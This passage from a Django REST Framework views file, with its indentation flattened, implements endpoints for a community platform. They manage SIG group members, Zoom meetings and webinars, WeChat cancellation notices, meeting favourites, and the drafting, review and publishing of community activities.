"""SIG组批量新增成员"""
serializer_class = GroupUserAddSerializer
queryset = GroupUser.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (AdminPermission,)
@swagger_auto_schema(operation_summary='SIG组批量新增成员')
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class GroupUserDelView(GenericAPIView, CreateModelMixin):
"""批量删除组成员"""
serializer_class = GroupUserDelSerializer
queryset = GroupUser.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (AdminPermission,)
def post(self, request, *args, **kwargs):
group_id = self.request.data.get('group_id')
ids = self.request.data.get('ids')
ids_list = [int(x) for x in ids.split('-')]
GroupUser.objects.filter(group_id=group_id, user_id__in=ids_list).delete()
return JsonResponse({'code': 204, 'msg': '删除成功'})
class MeetingsWeeklyView(GenericAPIView, ListModelMixin):
"""查询前后一周的所有会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
filter_backends = [SearchFilter]
search_fields = ['topic', 'group_name']
@swagger_auto_schema(operation_summary='查询前后一周的所有会议')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter((Q(
date__gte=str(datetime.datetime.now() - datetime.timedelta(days=7))[:10]) & Q(
date__lte=str(datetime.datetime.now() + datetime.timedelta(days=7))[:10]))).order_by('-date', 'start')
return self.list(request, *args, **kwargs)
class MeetingsDailyView(GenericAPIView, ListModelMixin):
"""查询本日的所有会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
@swagger_auto_schema(operation_summary='查询本日的所有会议')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter(date=str(datetime.datetime.now())[:10]).order_by('start')
return self.list(request, *args, **kwargs)
class MeetingsRecentlyView(GenericAPIView, ListModelMixin):
"""查询最近的会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
@swagger_auto_schema(operation_summary='查询最近的会议')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter(date__gte=datetime.datetime.now().strftime('%Y-%m-%d')).order_by('date','start')
return self.list(request, *args, **kwargs)
class MeetingView(GenericAPIView, RetrieveModelMixin):
"""查询会议(id)"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
@swagger_auto_schema(operation_summary='查询会议')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class MeetingDelView(GenericAPIView, DestroyModelMixin):
"""删除会议(mid)"""
serializer_class = MeetingSerializer
queryset = Meeting.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (MaintainerPermission,)
@swagger_auto_schema(operation_summary='删除会议')
def delete(self, request, *args, **kwargs):
mid = kwargs.get('mid')
try:
url = "https://api.zoom.us/v2/meetings/{}".format(mid)
headers = {
"authorization": "Bearer {}".format(settings.ZOOM_TOKEN)}
requests.request("DELETE", url, headers=headers)
except:
pass
# 会议作软删除
meeting = Meeting.objects.get(mid=mid)
Meeting.objects.filter(mid=mid).update(is_delete=1)
meeting_id = meeting.id
mid = meeting.mid
logger.info('{} has canceled the meeting which mid was {}'.format(request.user.gitee_name, mid))
# 发送会议取消通知
collections = Collect.objects.filter(meeting_id=meeting_id)
if collections:
access_token = self.get_token()
topic = meeting.topic
date = meeting.date
start_time = meeting.start
time = date + ' ' + start_time
for collection in collections:
user_id = collection.user_id
user = User.objects.get(id=user_id)
nickname = user.nickname
openid = user.openid
content = self.get_remove_template(openid, topic, time, mid)
r = requests.post(
'https://api.weixin.qq.com/cgi-bin/message/subscribe/send?access_token={}'.format(access_token),
data=json.dumps(content))
if r.status_code != 200:
logger.error('status code: {}'.format(r.status_code))
logger.error('content: {}'.format(r.json()))
else:
if r.json()['errcode'] != 0:
logger.warning('Error Code: {}'.format(r.json()['errcode']))
logger.warning('Error Msg: {}'.format(r.json()['errmsg']))
logger.warning('receiver: {}'.format(nickname))
else:
logger.info('meeting {} cancel message sent to {}.'.format(mid, nickname))
# 删除收藏
collection.delete()
return JsonResponse({"code": 204, "message": "Delete successfully."})
def get_remove_template(self, openid, topic, time, mid):
if len(topic) > 20:
topic = topic[:20]
content = {
"touser": openid,
"template_id": "UpxRbZf8Z9QiEPlZeRCgp_MKvvqHlo6tcToY8fToK50",
"page": "/pages/index/index",
"miniprogram_state": "developer",
"lang": "zh-CN",
"data": {
"thing1": {
"value": topic
},
"time2": {
"value": time
},
"thing4": {
"value": "会议{}已被取消".format(mid)
}
}
}
return content
def get_token(self):
appid = settings.APP_CONF['appid']
secret = settings.APP_CONF['secret']
url = 'https://api.weixin.qq.com/cgi-bin/token?appid={}&secret={}&grant_type=client_credential'.format(appid,
secret)
r = requests.get(url)
if r.status_code == 200:
try:
access_token = r.json()['access_token']
return access_token
except KeyError as e:
logger.error(e)
else:
logger.error(r.json())
logger.error('fail to get access_token,exit.')
sys.exit(1)
class UserInfoView(GenericAPIView, RetrieveModelMixin):
"""查询本机用户的level和gitee_name"""
serializer_class = UserInfoSerializer
queryset = User.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
def get(self, request, *args, **kwargs):
user_id = kwargs.get('pk')
if user_id != request.user.id:
logger.warning('user_id did not match.')
logger.warning('user_id:{}, request.user.id:{}'.format(user_id, request.user.id))
return JsonResponse({"code": 400, "message": "错误操作,信息不匹配!"})
return self.retrieve(request, *args, **kwargs)
class MeetingsDataView(GenericAPIView, ListModelMixin):
"""网页日历数据"""
serializer_class = MeetingsDataSerializer
queryset = Meeting.objects.filter(is_delete=0).order_by('start')
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset()).values()
tableData = []
date_list = []
for query in queryset:
date_list.append(query.get('date'))
date_list = sorted(list(set(date_list)))
for date in date_list:
tableData.append(
{
'date': date,
'timeData': [{
'id': meeting.id,
'group_name': meeting.group_name,
'startTime': meeting.start,
'endTime': meeting.end,
'duration': math.ceil(float(meeting.end.replace(':', '.'))) - math.floor(
float(meeting.start.replace(':', '.'))),
'duration_time': meeting.start.split(':')[0] + ':00' + '-' + str(
math.ceil(float(meeting.end.replace(':', '.')))) + ':00',
'name': meeting.topic,
'creator': meeting.sponsor,
'detail': meeting.agenda,
'url': User.objects.get(id=meeting.user_id).avatar,
'join_url': meeting.join_url,
'meeting_id': meeting.mid,
'etherpad': meeting.etherpad,
'video_url': '' if not Record.objects.filter(mid=meeting.mid, platform='bilibili') else
Record.objects.filter(mid=meeting.mid, platform='bilibili').values()[0]['url']
} for meeting in Meeting.objects.filter(is_delete=0, date=date)]
})
return Response({'tableData': tableData})
class SigMeetingsDataView(GenericAPIView, ListModelMixin):
"""网页SIG组日历数据"""
serializer_class = MeetingsDataSerializer
queryset = Meeting.objects.filter(is_delete=0).order_by('date', 'start')
def get(self, request, *args, **kwargs):
group_id = kwargs.get('pk')
queryset = self.filter_queryset(self.get_queryset()).filter(group_id=group_id).filter((Q(
date__gte=str(datetime.datetime.now() - datetime.timedelta(days=180))[:10]) & Q(
date__lte=str(datetime.datetime.now() + datetime.timedelta(days=30))[:10]))).values()
tableData = []
date_list = []
for query in queryset:
date_list.append(query.get('date'))
date_list = sorted(list(set(date_list)))
for date in date_list:
tableData.append(
{
'date': date,
'timeData': [{
'id': meeting.id,
'group_name': meeting.group_name,
'date': meeting.date,
'startTime': meeting.start,
'endTime': meeting.end,
'duration': math.ceil(float(meeting.end.replace(':', '.'))) - math.floor(
float(meeting.start.replace(':', '.'))),
'duration_time': meeting.start.split(':')[0] + ':00' + '-' + str(
math.ceil(float(meeting.end.replace(':', '.')))) + ':00',
'name': meeting.topic,
'creator': meeting.sponsor,
'detail': meeting.agenda,
'url': User.objects.get(id=meeting.user_id).avatar,
'join_url': meeting.join_url,
'meeting_id': meeting.mid,
'etherpad': meeting.etherpad,
'video_url': '' if not Record.objects.filter(mid=meeting.mid, platform='bilibili') else
Record.objects.filter(mid=meeting.mid, platform='bilibili').values()[0]['url']
} for meeting in Meeting.objects.filter(is_delete=0, group_id=group_id, date=date)]
})
return Response({'tableData': tableData})
class MeetingsView(GenericAPIView, CreateModelMixin):
"""创建会议"""
serializer_class = MeetingSerializer
queryset = Meeting.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (MaintainerPermission,)
@swagger_auto_schema(operation_summary='创建会议')
def post(self, request, *args, **kwargs):
t1 = time.time()
host_dict = settings.MEETING_HOSTS
# 获取data
data = self.request.data
date = data['date']
start = data['start']
end = data['end']
topic = data['topic']
community = data['community'] if 'community' in data else 'openeuler'
emaillist = data['emaillist'] if 'emaillist' in data else ''
summary = data['agenda'] if 'agenda' in data else ''
user_id = request.user.id
group_id = data['group_id']
record = data['record'] if 'record' in data else ''
start_time = ' '.join([date, start])
if start_time < datetime.datetime.now().strftime('%Y-%m-%d %H:%M'):
logger.warning('The start time should not be earlier than the current time.')
return JsonResponse({'code': 1005, 'message': '请输入正确的开始时间'})
if start >= end:
logger.warning('The end time must be greater than the start time.')
return JsonResponse({'code': 1001, 'message': '请输入正确的结束时间'})
start_search = datetime.datetime.strftime(
(datetime.datetime.strptime(start, '%H:%M') - datetime.timedelta(minutes=30)),
'%H:%M')
end_search = datetime.datetime.strftime(
(datetime.datetime.strptime(end, '%H:%M') + datetime.timedelta(minutes=30)),
'%H:%M')
# 查询待创建的会议与现有的预定会议是否冲突
unavailable_host_id = []
available_host_id = []
meetings = Meeting.objects.filter(is_delete=0, date=date, end__gt=start_search, start__lt=end_search).values()
try:
for meeting in meetings:
host_id = meeting['host_id']
unavailable_host_id.append(host_id)
logger.info('unavilable_host_id:{}'.format(unavailable_host_id))
except KeyError:
pass
host_list = list(host_dict.keys())
logger.info('host_list:{}'.format(host_list))
for host_id in host_list:
if host_id not in unavailable_host_id:
available_host_id.append(host_id)
logger.info('avilable_host_id:{}'.format(available_host_id))
if len(available_host_id) == 0:
logger.warning('暂无可用host')
return JsonResponse({'code': 1000, 'message': '暂无可用host,请前往官网查看预定会议'})
# 从available_host_id中随机生成一个host_id,并在host_dict中取出
host_id = random.choice(available_host_id)
host = host_dict[host_id]
logger.info('host_id:{}'.format(host_id))
logger.info('host:{}'.format(host))
# start_time拼接
if int(start.split(':')[0]) >= 8:
start_time = date + 'T' + ':'.join([str(int(start.split(':')[0]) - 8), start.split(':')[1], '00Z'])
else:
d = datetime.datetime.strptime(date, '%Y-%m-%d') - datetime.timedelta(days=1)
d2 = datetime.datetime.strftime(d, '%Y-%m-%d %H%M%S')[:10]
start_time = d2 + 'T' + ':'.join([str(int(start.split(':')[0]) + 16), start.split(':')[1], '00Z'])
# 计算duration
duration = (int(end.split(':')[0]) - int(start.split(':')[0])) * 60 + (
int(end.split(':')[1]) - int(start.split(':')[1]))
# 准备好调用zoom api的data
password = ""
for i in range(6):
ch = chr(random.randrange(ord('0'), ord('9') + 1))
password += ch
new_data = {}
new_data['settings'] = {}
new_data['start_time'] = start_time
new_data['duration'] = duration
new_data['topic'] = topic
new_data['password'] = password
new_data['settings']['waiting_room'] = False
new_data['settings']['auto_recording'] = record
new_data['settings']['join_before_host'] = True
new_data['settings']['jbh_time'] = 5
headers = {
"content-type": "application/json",
"authorization": "Bearer {}".format(settings.ZOOM_TOKEN)
}
url = "https://api.zoom.us/v2/users/{}/meetings".format(host)
# 发送post请求,创建会议
response = requests.post(url, data=json.dumps(new_data), headers=headers)
if response.status_code != 201:
logger.info('code: {}, fail to create.'.format(response.status_code))
return JsonResponse({'code': response.status_code, 'msg': 'Fail to create.'})
response = response.json()
# 发送email
join_url = response['join_url']
sig_name = data['group_name']
toaddrs = emaillist
p1 = Process(target=sendmail, args=(topic, date, start, join_url, sig_name, toaddrs, summary, record))
p1.start()
# 数据库生成数据
Meeting.objects.create(
mid=response['id'],
topic=data['topic'],
community=community,
sponsor=data['sponsor'],
group_name=data['group_name'],
date=date,
start=start,
end=end,
etherpad=data['etherpad'],
emaillist=emaillist,
timezone=response['timezone'],
agenda=data['agenda'] if 'agenda' in data else '',
host_id=response['host_id'],
join_url=response['join_url'],
start_url=response['start_url'],
user_id=user_id,
group_id=group_id
)
logger.info('{} has created a meeting which mid is {}.'.format(data['sponsor'], response['id']))
logger.info('meeting info: {},{}-{},{}'.format(date, start, end, topic))
# 如果开启录制功能,则在Video表中创建一条数据
if record == 'cloud':
Video.objects.create(
mid=response['id'],
topic=data['topic'],
community=community,
group_name=data['group_name'],
agenda=data['agenda'] if 'agenda' in data else ''
)
logger.info('meeting {} was created with auto recording.'.format(response['id']))
# 返回请求数据
resp = {'code': 201, 'message': '创建成功'}
meeting = Meeting.objects.get(mid=response['id'])
resp['id'] = meeting.id
t3 = time.time()
print('total waste: {}'.format(t3 - t1))
return JsonResponse(resp)
class MyMeetingsView(GenericAPIView, ListModelMixin):
"""查询我创建的所有会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.all().filter(is_delete=0)
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='查询我创建的所有会议')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
queryset = Meeting.objects.filter(is_delete=0, user_id=user_id).order_by('-date', 'start')
if User.objects.get(id=user_id).level == 3:
queryset = Meeting.objects.filter(is_delete=0).order_by('-date', 'start')
return queryset
class AllMeetingsView(GenericAPIView, ListModelMixin):
"""列出所有会议"""
serializer_class = AllMeetingsSerializer
queryset = Meeting.objects.all()
filter_backends = [SearchFilter]
search_fields = ['is_delete', 'group_name', 'sponsor', 'date', 'start', 'end']
permission_classes = (QueryPermission,)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class CollectView(GenericAPIView, ListModelMixin, CreateModelMixin):
"""收藏会议"""
serializer_class = CollectSerializer
queryset = Collect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def post(self, request, *args, **kwargs):
user_id = self.request.user.id
meeting_id = self.request.data['meeting']
Collect.objects.create(meeting_id=meeting_id, user_id=user_id)
resp = {'code': 201, 'msg': 'collect successfully'}
return JsonResponse(resp)
def get_queryset(self):
queryset = Collect.objects.filter(user_id=self.request.user.id)
return queryset
class CollectDelView(GenericAPIView, DestroyModelMixin):
"""取消收藏"""
serializer_class = CollectSerializer
queryset = Collect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
def get_queryset(self):
queryset = Collect.objects.filter(user_id=self.request.user.id)
return queryset
class MyCollectionsView(GenericAPIView, ListModelMixin):
"""我收藏的会议(列表)"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
collection_lst = Collect.objects.filter(user_id=user_id).values_list('meeting', flat=True)
queryset = Meeting.objects.filter(is_delete=0, id__in=collection_lst).order_by('-date', 'start')
return queryset
class ParticipantsView(GenericAPIView, RetrieveModelMixin):
"""查询会议的参会者"""
permission_classes = (QueryPermission,)
def get(self, request, *args, **kwargs):
mid = kwargs.get('mid')
try:
url = "https://api.zoom.us/v2/past_meetings/{}/participants".format(mid)
headers = {
"authorization": "Bearer {}".format(settings.ZOOM_TOKEN)}
r = requests.get(url, headers=headers)
if r.status_code == 200:
return JsonResponse(
{'total_records': r.json()['total_records'], 'participants': r.json()['participants']})
else:
return JsonResponse(r.json())
except Exception as e:
logger.error(e)
return JsonResponse({'msg': e})
class SponsorsView(GenericAPIView, ListModelMixin):
"""活动发起人列表"""
serializer_class = SponsorSerializer
queryset = User.objects.filter(activity_level=2)
filter_backends = [SearchFilter]
search_fields = ['nickname']
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='活动发起人列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class NonSponsorView(GenericAPIView, ListModelMixin):
"""非活动发起人列表"""
serializer_class = SponsorSerializer
queryset = User.objects.filter(activity_level=1)
filter_backends = [SearchFilter]
search_fields = ['nickname']
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='非活动发起人列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class SponsorAddView(GenericAPIView, CreateModelMixin):
"""批量添加活动发起人"""
queryset = User.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='批量添加活动发起人')
def post(self, request, *args, **kwargs):
ids = self.request.data.get('ids')
ids_list = [int(x) for x in ids.split('-')]
User.objects.filter(id__in=ids_list, activity_level=1).update(activity_level=2)
return JsonResponse({'code': 201, 'msg': '添加成功'})
class SponsorDelView(GenericAPIView, CreateModelMixin):
"""批量删除组成员"""
queryset = GroupUser.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='批量删除活动发起人')
def post(self, request, *args, **kwargs):
ids = self.request.data.get('ids')
ids_list = [int(x) for x in ids.split('-')]
User.objects.filter(id__in=ids_list, activity_level=2).update(activity_level=1)
return JsonResponse({'code': 204, 'msg': '删除成功'})
class SponsorInfoView(GenericAPIView, UpdateModelMixin):
"""修改活动发起人信息"""
serializer_class = SponsorInfoSerializer
queryset = User.objects.filter(activity_level=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='修改活动发起人信息')
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
class DraftsView(GenericAPIView, ListModelMixin):
"""审核列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='审核列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class DraftView(GenericAPIView, RetrieveModelMixin):
"""待发布详情"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='待发布详情')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class ActivityView(GenericAPIView, CreateModelMixin):
"""创建活动并申请发布"""
serializer_class = ActivitySerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='创建活动并申请发布')
def post(self, request, *args, **kwargs):
data = self.request.data
title = data['title']
date = data['date']
if date < (datetime.datetime.now() + datetime.timedelta(days=1)).strftime('%Y-%m-%d'):
return JsonResponse({'code': 400, 'msg': '请最早提前一天申请活动'})
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
enterprise = User.objects.get(id=user_id).enterprise
# 线下活动
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.create(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
status=2,
enterprise=enterprise
)
# 线上活动
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.create(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
status=2,
enterprise=enterprise
)
return JsonResponse({'code': 201, 'msg': '活动申请发布成功!'})
class ActivitiesView(GenericAPIView, ListModelMixin):
"""活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0, status__gt=2).order_by('-date', 'id')
filter_backends = [SearchFilter]
search_fields = ['title', 'enterprise']
@swagger_auto_schema(operation_summary='活动列表')
def get(self, request, *args, **kwargs):
activity_status = self.request.GET.get('activity')
activity_type = self.request.GET.get('activity_type')
if activity_status == 'registering':
self.queryset = self.queryset.filter(status__in=[3, 4])
if activity_status == 'going':
self.queryset = self.queryset.filter(status=4)
if activity_status == 'completed':
self.queryset = self.queryset.filter(status=5)
if activity_type:
try:
if int(activity_type) == 1:
self.queryset = self.queryset.filter(activity_type=1)
if int(activity_type) == 2:
self.queryset = self.queryset.filter(activity_type=2)
if int(activity_type) == 1 and activity_status == 'registering':
self.queryset = self.queryset.filter(activity_type=1, status__in=[3, 4])
if int(activity_type) == 1 and activity_status == 'going':
self.queryset = self.queryset.filter(activity_type=1, status=4)
if int(activity_type) == 1 and activity_status == 'completed':
self.queryset = self.queryset.filter(activity_type=1, status=5)
if int(activity_type) == 2 and activity_status == 'registering':
self.queryset = self.queryset.filter(activity_type=2, status__in=[3, 4])
if int(activity_type) == 2 and activity_status == 'going':
self.queryset = self.queryset.filter(activity_type=2, status=4)
if int(activity_type) == 2 and activity_status == 'completed':
self.queryset = self.queryset.filter(activity_type=2, status=5)
except TypeError:
pass
return self.list(request, *args, **kwargs)
class RecentActivitiesView(GenericAPIView, ListModelMixin):
"""最近的活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0)
filter_backends = [SearchFilter]
search_fields = ['enterprise']
@swagger_auto_schema(operation_summary='最近的活动列表')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter(status__gt=2, date__gt=datetime.datetime.now().strftime('%Y-%m-%d')).order_by('-date', 'id')
return self.list(request, *args, **kwargs)
class SponsorActivitiesView(GenericAPIView, ListModelMixin):
"""活动发起人的活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='我(活动发起人)的活动列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status__gt=2, user_id=self.request.user.id)
return queryset
class ActivityRetrieveView(GenericAPIView, RetrieveModelMixin):
"""查询单个活动"""
serializer_class = ActivityRetrieveSerializer
queryset = Activity.objects.filter(is_delete=0, status__gt=2)
@swagger_auto_schema(operation_summary='查询一个活动')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class ActivityUpdateView(GenericAPIView, UpdateModelMixin):
"""修改一个活动"""
serializer_class = ActivityUpdateSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='修改活动')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
mid = Activity.objects.get(id=activity_id).mid
schedules = self.request.data['schedules']
invite.add_panelists(mid, schedules)
return self.update(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
activity_level = User.objects.get(id=user_id).activity_level
queryset = Activity.objects.filter(is_delete=0, status__in=[3, 4], user_id=self.request.user.id)
if activity_level == 3:
queryset = Activity.objects.filter(is_delete=0, status__in=[3, 4])
return queryset
class ActivityPublishView(GenericAPIView, UpdateModelMixin):
"""通过申请"""
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='活动过审')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
appid = settings.APP_CONF['appid']
secret = settings.APP_CONF['secret']
if activity_id in self.queryset.values_list('id', flat=True):
logger.info('活动id: {}'.format(activity_id))
img_url = gene_wx_code.run(appid, secret, activity_id)
logger.info('生成活动页面二维码: {}'.format(img_url))
sign_url = gene_sign_code.run(appid, secret, activity_id)
logger.info('生成活动签到二维码: {}'.format(sign_url))
Activity.objects.filter(id=activity_id, status=2).update(status=3, wx_code=img_url, sign_url=sign_url)
logger.info('活动通过审核')
activity = Activity.objects.get(id=activity_id)
if activity.activity_type == online:
date = activity.date
title = activity.title
start = activity.start
end = activity.end
synopsis = activity.synopsis
# 创建网络研讨会
start_time = (datetime.datetime.strptime(date + start, '%Y-%m-%d%H:%M') - datetime.timedelta(hours=8)).strftime('%Y-%m-%dT%H:%M:%SZ')
duration = int((datetime.datetime.strptime(end, '%H:%M') - datetime.datetime.strptime(start, '%H:%M')).seconds / 60)
data = {
"topic": title,
"start_time": start_time,
"duration": duration,
"agenda": synopsis,
"template_id": settings.WEBINAR_TEMPLATE_ID,
"settings": {
"host_video": True,
"panelists_video": True,
"request_permission_to_unmute_participants": True
}
}
headers = {
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(settings.ZOOM_TOKEN)
}
r = requests.post('https://api.zoom.us/v2/users/{}/webinars'.format(settings.WEBINAR_HOST), headers=headers, data=json.dumps(data))
if r.status_code == 201:
logger.info('创建网络研讨会')
start_url = r.json()['start_url']
join_url = r.json()['join_url']
mid = r.json()['id']
Activity.objects.filter(id=activity_id).update(start_url=start_url, join_url=join_url, mid=mid)
# 发送start_url给sponsor
activity = Activity.objects.get(id=activity_id)
date = activity.date
start = activity.start
topic = activity.title
start_url = activity.start_url
password = r.json()['password']
summary = activity.synopsis,
user = User.objects.get(id=activity.user_id)
email = user.email
send_start_url.run(date, start, topic, start_url, password, summary, email)
logger.info('成功发送主持人地址邮件')
invite.invite_panelists(mid)
logger.info('成功发送嘉宾邀请邮件')
return JsonResponse({'code': 201, 'msg': '活动通过审核,已发布'})
else:
return JsonResponse({'code': 404, 'msg': '无此数据'})
class ActivityRejectView(GenericAPIView, UpdateModelMixin):
"""驳回申请"""
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='驳回申请')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
if activity_id in self.queryset.values_list('id', flat=True):
Activity.objects.filter(id=activity_id, status=2).update(status=1)
return JsonResponse({'code': 201, 'msg': '活动申请已驳回'})
else:
return JsonResponse({'code': 404, 'msg': '无此数据'})
class ActivityDelView(GenericAPIView, UpdateModelMixin):
"""删除一个活动"""
queryset = Activity.objects.filter(is_delete=0, status__gt=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='删除活动')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
Activity.objects.filter(id=activity_id).update(is_delete=1)
return JsonResponse({'code': 204, 'msg': '成功删除活动'})
class ActivityDraftView(GenericAPIView, CreateModelMixin):
"""创建活动草案"""
serializer_class = ActivitySerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='创建活动草案')
def post(self, request, *args, **kwargs):
data = self.request.data
title = data['title']
date = data['date']
if date < (datetime.datetime.now() + datetime.timedelta(days=1)).strftime('%Y-%m-%d'):
return JsonResponse({'code': 400, 'msg': '请最早提前一天申请活动'})
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
enterprise = User.objects.get(id=user_id).enterprise
# 线下活动
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.create(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
enterprise=enterprise
)
# 线上活动
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.create(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
enterprise=enterprise
)
return JsonResponse({'code': 201, 'msg': '活动草案创建成功!'})
class ActivitiesDraftView(GenericAPIView, ListModelMixin):
"""活动草案列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='我(活动发起人)的活动草案列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status=1, user_id=self.request.user.id).order_by('-date', 'id')
return queryset
class SponsorActivityDraftView(GenericAPIView, RetrieveModelMixin, DestroyModelMixin):
"""查询、删除活动草案"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='查询一个活动草案')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
@swagger_auto_schema(operation_summary='删除活动草案')
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status=1, user_id=self.request.user.id).order_by('-date', 'id')
return queryset
class DraftUpdateView(GenericAPIView, UpdateModelMixin):
"""修改活动草案"""
serializer_class = ActivityDraftUpdateSerializer
queryset = Activity.objects.filter(is_delete=0, status=1)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
def put(self, reuqest, *args, **kwargs):
activity_id = self.kwargs.get('pk')
data = self.request.data
title = data['title']
date = data['date']
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
